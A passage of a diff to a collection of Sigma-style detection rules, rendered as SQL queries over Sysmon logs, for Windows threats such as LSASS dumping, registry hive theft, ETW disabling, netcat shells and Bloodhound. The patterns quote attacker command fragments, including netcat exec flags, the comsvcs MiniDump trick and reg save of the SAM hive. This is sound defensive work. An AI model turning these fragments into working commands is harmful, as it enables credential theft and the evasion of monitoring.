in a process command line", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_mssql_susp_child_process.yml" + }, + { + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR Image LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate ncat use" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 